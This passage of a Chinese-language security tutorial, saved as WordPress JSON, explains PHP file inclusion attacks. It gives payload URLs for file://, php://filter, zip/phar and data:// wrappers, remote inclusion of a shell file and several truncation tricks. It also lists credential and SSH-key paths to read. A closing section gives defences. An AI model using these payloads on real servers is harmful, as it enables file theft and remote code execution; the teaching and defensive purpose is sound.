\u5728\u672c\u5730\u5305\u542b\u6f0f\u6d1e\u91cc\u53ef\u4ee5\u4f7f\u7528 file \u534f\u8bae\uff0c\u4f7f\u7528 file \u534f\u8bae\u53ef\u4ee5\u8bfb\u53d6\u672c\u5730\u6587\u4ef6<\/p>\n
file:\/\/\/etc\/passwd<\/p>\n
\"1746407811197-bee6122d-2321-4ebc-8f9b-a39711e90389.png\"<\/p>\n
\u8bfb\u53d6\u76f8\u5bf9\u8def\u5f84\u6587\u4ef6<\/p>\n
http:\/\/192.168.0.103\/lfi.php?file=.\/01\/php.ini<\/a><\/p>\n
php:\/\/<\/h3>\n
php:\/\/ \u7528\u4e8e\u8bbf\u95ee\u5404\u4e2a\u8f93\u5165\/\u8f93\u51fa\u6d41\uff08I\/O streams\uff09\uff0c\u7ecf\u5e38\u4f7f\u7528\u7684\u662f php:\/\/filter \u548c php:\/\/input<\/p>\n
php:\/\/filter \u7528\u4e8e\u8bfb\u53d6\u6e90\u7801<\/p>\n
php:\/\/input \u7528\u4e8e\u6267\u884c php \u4ee3\u7801<\/p>\n
\"1746407982472-a0db4136-ad09-4f0b-a188-8f91327b6348.png\"<\/p>\n
php:\/\/filter \u53c2\u6570\u8be6\u89e3<\/p>\n
\"1746408038838-15035c09-820e-4e3f-b0e6-92e579b47b52.png\"<\/p>\n
\"1746408051625-430e63d5-1190-439c-906e-e95e92faec81.png\"<\/p>\n
\u53ef\u7528\u7684\u8fc7\u6ee4\u5668\u5217\u8868\uff084 \u7c7b\uff09<\/p>\n
\"1746408064945-9a98898c-2c2b-4364-b68c-ecad9b52108b.png\"<\/p>\n
\"1746408073364-b23564dd-0400-489e-90ed-0b5079590108.png\"<\/p>\n
\u4f7f\u7528\u534f\u8bae\u8bfb\u53d6\u6587\u4ef6\u6e90\u7801<\/p>\n
php:\/\/filter\/read=convert.base64-encode\/resource=\/etc\/passwd<\/p>\n
\"1746408089680-99cc0cd7-0098-4a7e-ad21-d94a6a8cddee.png\"<\/p>\n
\u8bfb\u53d6\u6587\u4ef6\u540e\u518d\u8fdb\u884c base64 \u89e3\u7801<\/p>\n
\"1746408103233-56cff2d1-74cf-4c4e-a82d-2dbe088cd325.png\"<\/p>\n
phar:\/\/\u3001zip:\/\/\u3001bzip2:\/\/\u3001zlib:\/\/<\/h3>\n
\u7528\u4e8e\u8bfb\u53d6\u538b\u7f29\u6587\u4ef6\uff0czip:\/\/ \u3001 bzip2:\/\/ \u3001 zlib:\/\/ \u5747\u5c5e\u4e8e\u538b\u7f29\u6d41\uff0c\u53ef\u4ee5\u8bbf\u95ee\u538b\u7f29\u6587\u4ef6\u4e2d\u7684\u5b50\u6587\u4ef6\uff0c\u66f4\u91cd\u8981\u7684\u662f\u4e0d\u9700\u8981\u6307\u5b9a\u540e\u7f00\u540d\uff0c\u53ef\u4fee\u6539\u4e3a\u4efb\u610f\u540e\u7f00\uff1ajpg png gif xxx \u7b49\u7b49<\/p>\n
zip:\/\/[\u538b\u7f29\u6587\u4ef6\u7edd\u5bf9\u8def\u5f84]%23[\u538b\u7f29\u6587\u4ef6\u5185\u7684\u5b50\u6587\u4ef6\u540d]\uff08#\u7f16\u7801\u4e3a%23\uff09<\/h4>\n
http:\/\/127.0.0.1\/include.php?file=zip:\/\/E:phpStudyPHPTutorialWWWphpinfo.jpg%23phpinfo.txt<\/a><\/p>\n
\"1746408155041-4cae4083-a628-4e1e-88ff-2868ed49067d.png\"<\/p>\n
compress.bzip2:\/\/file.bz2<\/h4>\n
http:\/\/127.0.0.1\/include.php?file=compress.bzip2:\/\/D:\/soft\/phpStudy\/WWW\/file.jpg<\/a><\/p>\n
http:\/\/127.0.0.1\/include.php?file=compress.bzip2:\/\/.\/file.jpg<\/a><\/p>\n
compress.zlib:\/\/file.gz<\/h4>\n
http:\/\/127.0.0.1\/include.php?file=compress.zlib:\/\/D:\/soft\/phpStudy\/WWW\/file.jpg<\/a><\/p>\n
http:\/\/127.0.0.1\/include.php?file=compress.zlib:\/\/.\/file.jpg<\/a><\/p>\n
phar:\/\/<\/h4>\n
http:\/\/127.0.0.1\/include.php?file=phar:\/\/E:\/phpStudy\/PHPTutorial\/WWW\/phpinfo.zip\/phpinfo.txt<\/a><\/p>\n
data:\/\/ \u534f\u8bae<\/h3>\n
data:\/\/text\/plain,<\/h4>\n
http:\/\/127.0.0.1\/include.php?file=data:\/\/text\/plain<\/a>,<?php%20phpinfo();?><\/p>\n
data:\/\/text\/plain;base64,<\/h4>\n
http:\/\/127.0.0.1\/include.php?file=data:\/\/text\/plain;base64,PD9waHAgcGhwaW5mbygpOz8%2b<\/a><\/p>\n
\u6587\u4ef6\u5305\u542b\u5e38\u7528\u8def\u5f84<\/h2>\n
\u5305\u542b\u65e5\u5fd7\u6587\u4ef6 getshell<\/h3>\n
\/usr\/local\/apache2\/logs\/access_log<\/p>\n
\/logs\/access_log<\/p>\n
\/etc\/httpd\/logs\/access_log<\/p>\n
\/var\/log\/httpd\/access_log<\/p>\n
\u8bfb\u53d6\u7f51\u7ad9\u914d\u7f6e\u6587\u4ef6<\/h3>\n
dedecms \u6570\u636e\u5e93\u914d\u7f6e\u6587\u4ef6 data\/common.inc.php,<\/p>\n
discuz \u5168\u5c40\u914d\u7f6e\u6587\u4ef6 config\/config_global.php,<\/p>\n
phpcms \u914d\u7f6e\u6587\u4ef6 caches\/configs\/database.php<\/p>\n
phpwind \u914d\u7f6e\u6587\u4ef6 conf\/database.php<\/p>\n
wordpress \u914d\u7f6e\u6587\u4ef6 wp-config.php<\/p>\n
\u5305\u542b\u7cfb\u7edf\u914d\u7f6e\u6587\u4ef6<\/h3>\n
windows<\/h4>\n
C:\/boot.ini\/\/\u67e5\u770b\u7cfb\u7edf\u7248\u672c<\/p>\n
C:\/Windows\/System32\/inetsrv\/MetaBase.xml\/\/IIS \u914d\u7f6e\u6587\u4ef6<\/p>\n
C:\/Windows\/repairsam\/\/\u5b58\u50a8\u7cfb\u7edf\u521d\u6b21\u5b89\u88c5\u7684\u5bc6\u7801<\/p>\n
C:\/Program Files\/mysql\/my.ini\/\/Mysql \u914d\u7f6e<\/p>\n
C:\/Program Files\/mysql\/data\/mysql\/user.MYD\/\/Mysql root<\/p>\n
C:\/Windows\/php.ini\/\/php \u914d\u7f6e\u4fe1\u606f<\/p>\n
C:\/Windows\/my.ini\/\/Mysql \u914d\u7f6e\u4fe1\u606f<\/p>\n
linux<\/h4>\n
\/root\/.ssh\/authorized_keys<\/p>\n
\/root\/.ssh\/id_rsa<\/p>\n
\/root\/.ssh\/id_ras.keystore<\/p>\n
\/root\/.ssh\/known_hosts<\/p>\n
\/etc\/passwd<\/p>\n
\/etc\/shadow<\/p>\n
\/etc\/my.cnf<\/p>\n
\/etc\/httpd\/conf\/httpd.conf<\/p>\n
\/root\/.bash_history<\/p>\n
\/root\/.mysql_history<\/p>\n
\/proc\/self\/fd\/fd[0-9]*(\u6587\u4ef6\u6807\u8bc6\u7b26)<\/p>\n
\/proc\/mounts<\/p>\n
\/porc\/config.gz<\/p>\n
\u5305\u542b\u8fdc\u7a0b\u6587\u4ef6<\/h2>\n
\u5f53\u8fdc\u7a0b\u6587\u4ef6\u5f00\u542f\u65f6\uff0c\u53ef\u4ee5\u5305\u542b\u8fdc\u7a0b\u6587\u4ef6\u5230\u672c\u5730\u6267\u884c\u3002\u5f53 allow_url_fopen=On<\/p>\n
allow_url_include=ON \u4e24\u4e2a\u6761\u4ef6\u540c\u65f6\u4e3a On \u5141\u8bb8\u8fdc\u7a0b\u5305\u542b\u6587\u4ef6\u3002<\/p>\n
http:\/\/192.168.0.103\/lfi.php?file=http:\/\/192.168.0.103\/shell.txt<\/a><\/p>\n
192.168.0.103 \u8bbe\u7f6e\u4e3a\u8fdc\u7a0b\u7684 ip<\/p>\n
\"1746408379893-306194d0-685a-44d8-8271-62a0a33c1785.png\"<\/p>\n
\u6587\u4ef6\u5305\u542b\u622a\u65ad\u653b\u51fb<\/h2>\n
\u6587\u4ef6\u5305\u542b\u622a\u65ad\u653b\u51fb\uff0c\u5728 php \u7248\u672c\u5c0f\u4e8e 5.3.4 \u5141\u8bb8\u4f7f\u7528%00 \u622a\u65ad\uff0c\u5728\u4f7f\u7528 include \u7b49\u6587\u4ef6\u5305\u542b\u51fd\u6570\uff0c\u53ef\u4ee5\u622a\u65ad\u6587\u4ef6\u540d\uff0c\u622a\u65ad\u4f1a\u53d7 gpc \u5f71\u54cd\uff0c\u5982\u679c gpc \u4e3a On \u65f6\uff0c%00 \u4f1a\u88ab\u8f6c\u4ee5\u6210\u0000 \u622a\u65ad\u4f1a\u5931\u8d25<\/p>\n
\"1746408407742-7ffd6e9a-e604-48c8-855e-702f366d5451.png\"<\/p>\n
\u4f20\u5165 file \u6587\u4ef6\u540d\u62fc\u63a5.php \u5728\u7528 include \u5f15\u5165\u6587\u4ef6\u3002file \u53c2\u6570\u53ef\u63a7\u7684\u4f1a\u9020\u6210\u6f0f\u6d1e<\/p>\n
\u6587\u4ef6\u5305\u542b%00 \u622a\u65ad<\/h3>\n
\u4e0a\u4f20\u5e26\u6709\u6076\u610f\u4ee3\u7801\u7684\u6587\u4ef6\u5230\u7f51\u7ad9\u76ee\u5f55\uff0c\u5305\u542b\u5f15\u5165\u518d\u8fdb\u884c 00 \u622a\u65ad<\/p>\n
\u5f53\u524d\u6d4b\u8bd5\u7684\u7248\u672c\u662f php 5.2.17 gpc=off<\/p>\n
\"1746408439887-b5755a15-b9df-451d-b0f2-ef38a056a3b1.png\"<\/p>\n
\u8d85\u957f\u6587\u4ef6\u5305\u542b\u622a\u65ad<\/h3>\n
\u8fd9\u4e2a\u5408\u9002\u4e8e win32 \u53ef\u4ee5\u4f7f\u7528.\u8fdb\u884c\u622a\u65ad \u548c .<\/p>\n
(php \u7248\u672c\u5c0f\u4e8e 5.2.8 \u53ef\u4ee5\u6210\u529f\uff0clinux \u9700\u8981\u6587\u4ef6\u540d\u957f\u4e8e 4096\uff0cwindows \u9700\u8981\u957f\u4e8e 256)<\/p>\n
\u5229\u7528\u64cd\u4f5c\u7cfb\u7edf\u5bf9\u76ee\u5f55\u6700\u5927\u957f\u5ea6\u9650\u5236\u3002<\/p>\n
\u5728 window \u4e0b 256 \u5b57\u8282<\/p>\n
linux \u4e0b 4096 \u5b57\u8282<\/p>\n
\u70b9\u622a\u65ad<\/h4>\n
http:\/\/include.moonteam.com\/file02.php?file=x.jpg<\/a>………………………………………………………………………………………………………………………………………………………………………………………………………………<\/p>\n
\"1746408488162-66c4f3c6-53f3-49ce-ba10-aa44b149d222.png\"<\/p>\n
\/.\u622a\u65ad<\/h4>\n
http:\/\/include.moonteam.com\/file02.php?file=x.jpg%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e<\/a><\/p>\n
\"1746408535138-0126062e-1a01-487a-a43e-2e2615ca7503.png\"<\/p>\n
\u8fdc\u7a0b\u5305\u542b\u622a\u65ad<\/h3>\n
\u9002\u7528\u4e8e\u8fdc\u7a0b\u622a\u65ad\u7684\u5b57\u7b26\u6709<\/p>\n
\"1746408566459-5ab163c5-e840-4b28-beb7-1eb84ef9d985.png\"<\/p>\n
\u4ee5\u4e0a\u8fd9\u4e2a\u5b57\u7b26\u90fd\u53ef\u4ee5\u622a\u65ad<\/p>\n
allow_url_fopen =On<\/p>\n
allow_url_include=On<\/p>\n
http:\/\/192.168.0.103\/lfi2.php?file=http:\/\/192.168.0.103\/shell.txt<\/a>?<\/p>\n
\"1746408588506-700b22a4-49d5-4995-a722-1ad03980fa30.png\"<\/p>\n
\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e\u9632\u5fa1\u65b9\u6848<\/h3>\n
1.\u4e25\u683c\u5224\u65ad\u5305\u542b\u4e2d\u7684\u53c2\u6570\u662f\u5426\u5916\u90e8\u53ef\u63a7\uff0c\u56e0\u4e3a\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e\u5229\u7528\u6210\u529f\u4e0e\u5426\u7684\u5173\u952e\u70b9\u5c31\u5728\u4e8e\u88ab\u5305\u542b\u7684\u6587\u4ef6\u662f\u5426\u53ef\u88ab\u5916\u90e8\u63a7\u5236\uff1b<\/p>\n
2.\u8def\u5f84\u9650\u5236\uff1a\u9650\u5236\u88ab\u5305\u542b\u7684\u6587\u4ef6\u53ea\u80fd\u5728\u67d0\u4e00\u6587\u4ef6\u5185\uff0c\u4e00\u5b9a\u8981\u7981\u6b62\u76ee\u5f55\u8df3\u8f6c\u5b57\u7b26\uff0c\u5982\uff1a"..\/"\uff1b<\/p>\n
3.\u5305\u542b\u6587\u4ef6\u9a8c\u8bc1\uff1a\u9a8c\u8bc1\u88ab\u5305\u542b\u7684\u6587\u4ef6\u662f\u5426\u662f\u767d\u540d\u5355\u4e2d\u7684\u4e00\u5458\uff1b<\/p>\n
4.\u5c3d\u91cf\u4e0d\u8981\u4f7f\u7528\u52a8\u6001\u5305\u542b\uff0c\u53ef\u4ee5\u5728\u9700\u8981\u5305\u542b\u7684\u9875\u9762\u56fa\u5b9a\u5199\u597d\uff0c\u5982\uff1ainclude(‘head.php’)\u3002<\/p>\n
5.\u8bbe\u7f6e allow_url_include \u4e3a Off<\/p>\n
\n
\u66f4\u65b0: 2025-05-06 21:45:19
\n\u539f\u6587: https:\/\/www.yuque.com\/yuhui.net\/network\/vaxo1gcw4yut75qg<\/a><\/p>\n<\/blockquote>\n","protected":false},"excerpt":{"rendered":"
\u6587\u4ef6\u5305\u542b \u6982\u8ff0 \u7a0b\u5e8f\u5728\u5f15\u7528\u6587\u4ef6\u7684\u65f6\uff0c\u5f15\u7528\u7684\u6587\u4ef6\u540d\uff0c\u7528\u6237\u53ef\u63a7\u7684\u60c5\u51b5\uff0c\u4f20\u5165\u7684\u6587\u4ef6\u540d\u6ca1\u6709\u7ecf\u8fc7\u5408\u7406\u7684\u6821\u9a8c\u6216\u6821\u9a8c\u4e0d\u4e25\uff0c\u4ece\u800c\u64cd\u4f5c\u4e86\u9884\u60f3\u4e4b\u5916\u7684\u6587\u4ef6\uff0c\u5c31\u6709\u53ef\u80fd\u5bfc\u81f4\u6587\u4ef6\u6cc4\u6f0f\u548c\u6076\u610f\u7684\u4ee3\u7801\u6ce8\u5165\u3002 \u7a0b\u5e8f\u5f00\u53d1\u4eba\u5458\u4e00\u822c\u4f1a\u628a\u91cd\u590d\u4f7f\u7528\u7684\u51fd\u6570\u5199\u5230\u5355\u4e2a\u6587\u4ef6\u4e2d\uff0c\u9700\u8981\u4f7f\u7528\u67d0\u4e2a\u51fd\u6570\u65f6\u76f4\u63a5\u8c03\u7528\u6b64\u6587\u4ef6\uff0c\u800c\u65e0\u9700\u518d\u6b21\u7f16\u5199 \u91cd\u6587\u4ef6\u8c03\u7528\u7684\u8fc7\u7a0b\u4e00\u822c\u88ab\u79f0\u4e3a\u6587\u4ef6\u5305\u542b\u3002 \u7a0b\u5e8f\u5f00\u53d1\u4eba\u5458\u4e00\u822c\u5e0c\u671b\u4ee3\u7801\u66f4\u7075\u6d3b\uff0c\u6240\u4ee5\u5c06\u88ab\u5305\u542b\u7684\u6587\u4ef6\u8bbe\u7f6e\u4e3a\u53d8\u91cf\uff0c\u7528\u6765\u8fdb\u884c\u52a8\u6001\u8c03\u7528\uff0c\u4f46\u6b63\u662f\u7531 […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[119,120,2],"tags":[12,22,43,57,60],"class_list":["post-787","post","type-post","status-publish","format-standard","hentry","category-shentouceshijichu-network_sec","category-loudongleibie","category-network_sec","tag-12","tag-windows","tag-43","tag-python","tag-shujuku"],"_links":{"self":[{"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/posts\/787","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/comments?post=787"}],"version-history":[{"count":0,"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/posts\/787\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/media?parent=787"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/categories?post=787"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/tags?post=787"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}